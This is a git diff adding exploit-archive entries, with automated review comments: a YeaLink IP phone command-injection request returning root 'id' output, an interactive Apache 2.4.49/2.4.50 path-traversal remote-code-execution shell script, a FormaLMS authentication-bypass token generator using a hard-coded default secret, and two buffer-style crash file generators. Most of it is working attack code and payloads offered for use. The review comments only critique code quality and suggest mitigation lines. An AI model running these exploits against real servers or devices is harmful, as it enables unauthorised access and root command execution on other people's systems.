diff --git a/exploits/hardware/webapps/50509.txt b/exploits/hardware/webapps/50509.txt
new file mode 100644
index 000000000..ce3279ee6
--- /dev/null
+++ b/exploits/hardware/webapps/50509.txt
@@ -0,0 +1,44 @@
+# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
+# Date: 11-10-2021
+# Exploit Author: tahaafarooq
+# Vendor Homepage: https://www.yealink.com/
+# Version: 53.84.0.15
+# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)
+
+Description:
+
+Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection
+
+POC:
+
+POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 49
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+Origin: http://xxx.xxx.xxx.xxx
+Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=9a83d24461329a130
+Connection: close
+
+cmd=; id;&token=1714636915c6acea98
+
+-------------------------------------------------
+
+HTTP/1.1 200 OK
+Content-Type: text/html
+Connection: close
+Date: Wed, 10 Nov 2021 14:20:23 GMT
+Server: embed httpd
+Content-Length: 82
+
+
+
+
+ uid=0(root) gid=0(root)
+
+
+
\ No newline at end of file
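Review bot: The Description never states the impact that the captured response demonstrates: the body shows `uid=0(root) gid=0(root)`, so the `cmd` parameter of the network-diagnosis handler is executed as root. That belongs in the write-up, e.g. `Impact: an authenticated web-UI user gets OS command execution as root`. The title claims the whole SIP-TXXXP family while `Tested on` lists only the SIP-T19P, so the affected scope should be hedged or the tested models listed. No fixed firmware version is given on the page; a closing line advising that the phone's web management interface be kept off untrusted networks until a fix is confirmed would make the entry usable for defenders.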
diff --git a/exploits/multiple/webapps/50512.py b/exploits/multiple/webapps/50512.py
new file mode 100755
index 000000000..3f6971971
--- /dev/null
+++ b/exploits/multiple/webapps/50512.py
@@ -0,0 +1,121 @@
+# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
+# Date: 11/11/2021
+# Exploit Author: Valentin Lobstein
+# Vendor Homepage: https://apache.org/
+# Software Link: https://github.com/Balgogan/CVE-2021-41773
+# Version: Apache 2.4.49/2.4.50 (CGI enabled)
+# Tested on: Debian GNU/Linux
+# CVE : CVE-2021-41773 / CVE-2021-42013
+# Credits : Lucas Schnell
+
+
+#!/usr/bin/env python3
+#coding: utf-8
+
+import os
+import re
+import sys
+import time
+import requests
+from colorama import Fore,Style
+
+
+header = '''\033[1;91m
+
+ ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████
+ ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
+ ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
+ ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
+ ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
+ ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
+ ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
+ ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░
+''' + Style.RESET_ALL
+
+
+if len(sys.argv) < 2 :
+ print( 'Use: python3 file.py ip:port ' )
+ sys.exit()
+
+def end():
+ print("\t\033[1;91m[!] Bye bye !")
+ time.sleep(0.5)
+ sys.exit(1)
+
+def commands(url,command,session):
+ directory = mute_command(url,'pwd')
+ user = mute_command(url,'whoami')
+ hostname = mute_command(url,'hostname')
+ advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
+ command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
+ command = f"echo; {command};"
+ req = requests.Request('POST', url=url, data=command)
+ prepare = req.prepare()
+ prepare.url = url
+ response = session.send(prepare, timeout=5)
+ output = response.text
+ print(output)
+ if 'clear' in command:
+ os.system('/usr/bin/clear')
+ print(header)
+ if 'exit' in command:
+ end()
+
+def mute_command(url,command):
+ session = requests.Session()
+ req = requests.Request('POST', url=url, data=f"echo; {command}")
+ prepare = req.prepare()
+ prepare.url = url
+ response = session.send(prepare, timeout=5)
+ return response.text.strip()
+
+
+def exploitRCE(payload):
+ s = requests.Session()
+ try:
+ host = sys.argv[1]
+ if 'http' not in host:
+ url = 'http://'+ host + payload
+ else:
+ url = host + payload
+ session = requests.Session()
+ command = "echo; id"
+ req = requests.Request('POST', url=url, data=command)
+ prepare = req.prepare()
+ prepare.url = url
+ response = session.send(prepare, timeout=5)
+ output = response.text
+ if "uid" in output:
+ choice = "Y"
+ print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
+ print("[!] Sortie:\n\n" + Fore.YELLOW + output )
+ choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
+ if choice.lower() in ['','y','yes']:
+ while True:
+ commands(url,command,session)
+ else:
+ end()
+ else :
+ print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
+ except KeyboardInterrupt:
+ end()
+
+def main():
+ try:
+ apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
+ apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
+ payloads = [apache2449_payload,apache2450_payload]
+ choice = len(payloads) + 1
+ print(header)
+ print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
+ while choice >= len(payloads) and choice >= 0:
+ choice = int(input('[~] Choice : '))
+ if choice < len(payloads):
+ exploitRCE(payloads[choice])
+ except KeyboardInterrupt:
+ print("\n\033[1;91m[!] Bye bye !")
+ time.sleep(0.5)
+ sys.exit(1)
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
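Review bot: The vulnerability verdict in `exploitRCE` rests on `if "uid" in output:`, a bare substring test, so any response body that happens to contain "uid" is reported as vulnerable and a patched host can be mis-triaged. Matching the shape of `id` output instead, e.g. `if re.search(r"uid=\d+\(", output):`, uses the `re` module that is imported but otherwise unused here. The header also omits the fix and the preconditions a defender needs; consider adding `# Fixed in: Apache 2.4.51 (requires mod_cgi enabled and no "Require all denied" on the filesystem root)`. The `#!/usr/bin/env python3` line sits after the comment header, so despite mode 100755 it does not act as a shebang.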
diff --git a/exploits/multiple/webapps/50513.py b/exploits/multiple/webapps/50513.py
new file mode 100755
index 000000000..66fea3c3e
--- /dev/null
+++ b/exploits/multiple/webapps/50513.py
@@ -0,0 +1,51 @@
+# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass
+# Google Dork: inurl:index.php?r=adm/
+# Date: 2021-11-10
+# Exploit Author: Cristian 'void' Giustini @ Hacktive Security
+# Vendor Homepage: https://formalms.org
+# Software Link: https://formalms.org
+# Version: <= 2.4.4
+# Tested on: Linux
+# CVE : CVE-2021-43136
+
+# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.
+
+# Analysis:
+https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/
+
+# Nuclei template:
+https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml
+
+#!/usr/bin/env python
+
+"""
+
+The following exploit generates two URLs with empty and fixed value of the "secret". In order to achieve a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled
+
+"""
+
+import sys
+import time
+import hashlib
+
+secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c"
+
+ def help():
+
+ print(f"Usage: {sys.argv[0]} username target_url")
+
+ sys.exit()
+
+
+if len(sys.argv) < 3:
+
+ help()
+
+user, url = (sys.argv[1], sys.argv[2])
+t = str(int(time.time()) + 5000)
+token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()
+final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
+print(f"URL with default secret: {final_url}")
+token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper()
+final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
+print(f"URL with empty secret: {final_url}")
\ No newline at end of file
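Review bot: The two URL lines under `# Analysis:` and `# Nuclei template:` are bare text rather than comments, so the file does not parse as Python as committed; prefix both with `# `. The `def help():` line also appears to carry a leading space that the following top-level `if` does not, though whitespace may be mangled in this view, and `help` shadows the builtin, so `usage` at column 0 would be clearer. The header explains the precondition (token SSO enabled) but not the remedy. A line such as `# Mitigation: set a unique, non-empty SSO secret or disable the token SSO setting` would help defenders, worded as unverified because the fixed version is not on the page.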
diff --git a/exploits/windows/dos/50510.py b/exploits/windows/dos/50510.py
new file mode 100755
index 000000000..60cd08922
--- /dev/null
+++ b/exploits/windows/dos/50510.py
@@ -0,0 +1,37 @@
+# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-10
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
+# Tested Version: 11.24
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)
+
+# Steps to reproduce:
+# 1. - Download and install AbsoluteTelnet
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open AbsoluteTelnet 11.24
+# 4. - "new connection file -> Connection -> SSH1 & SSH2"
+# 5. - Paste the characters of txt file to "Authentication -> Username"
+# 6. - press "ok" button
+# 7. - Crashed
+# 8. - Reopen AbsoluteTelnet 11.24
+# 9. - Copy the same characters to "Your Email Address (optional)"
+# 10.- Click "Send Error Report" button
+# 11.- Crashed
+
+
+#!/usr/bin/python
+
+exploit = 'A' * 1000
+
+try:
+ file = open("exploit.txt","w")
+ file.write(exploit)
+ file.close()
+
+ print("POC is created")
+except:
+ print("POC not created")
\ No newline at end of file
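Review bot: The bare `except:` around the file write catches everything, including KeyboardInterrupt, and reports only "POC not created" with no cause; `file.close()` is also skipped if `write` raises. Writing the body as `with open("exploit.txt", "w") as fh: fh.write(exploit)` and narrowing the handler to `except OSError as err:` with the error printed fixes both. The `#!/usr/bin/python` line is not the first line of the file, so it has no effect despite mode 100755. The same body is added in exploits/windows/dos/50511.py and this note applies there as well.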
diff --git a/exploits/windows/dos/50511.py b/exploits/windows/dos/50511.py
new file mode 100755
index 000000000..c5c29e6e2
--- /dev/null
+++ b/exploits/windows/dos/50511.py
@@ -0,0 +1,36 @@
+# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-10
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
+# Tested Version: 11.24
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)
+
+# Steps to reproduce:
+# 1. - Download and install AbsoluteTelnet
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open AbsoluteTelnet 11.24
+# 4. - "new connection file -> DialUp Connection
+# 5. - Paste the characters of txt file to "DialUp -> phone"
+# 6. - press "ok" button
+# 7. - Crashed
+# 8. - Reopen AbsoluteTelnet 11.24
+# 9. - Copy the same characters to "license name"
+# 10.- Click "Send Error Report" button
+# 11.- Crashed
+
+#!/usr/bin/python
+
+exploit = 'A' * 1000
+
+try:
+ file = open("exploit.txt","w")
+ file.write(exploit)
+ file.close()
+
+ print("POC is created")
+except:
+ print("POC not created")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 54c19dd63..b85795061 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6803,6 +6803,8 @@ id,file,description,date,author,type,platform,port
50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
+50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
+50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@@ -44606,3 +44608,6 @@ id,file,description,date,author,type,platform,port
50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,
50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php,
50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,
+50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware,
+50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple,
+50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,
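Review bot: The author field in the 50513 row is written as `"Cristian \'void\' Giustini"`, but backslash is not an escape character in CSV and single quotes inside a double-quoted field need no escaping, so a standard parser will return the backslashes as part of the name. Other rows visible in this diff put plain single quotes inside double-quoted fields (for example `'REDRAGON_MOUSE.sys'`). Unless a consumer of this file depends on the escaped form, write `"Cristian 'void' Giustini"`.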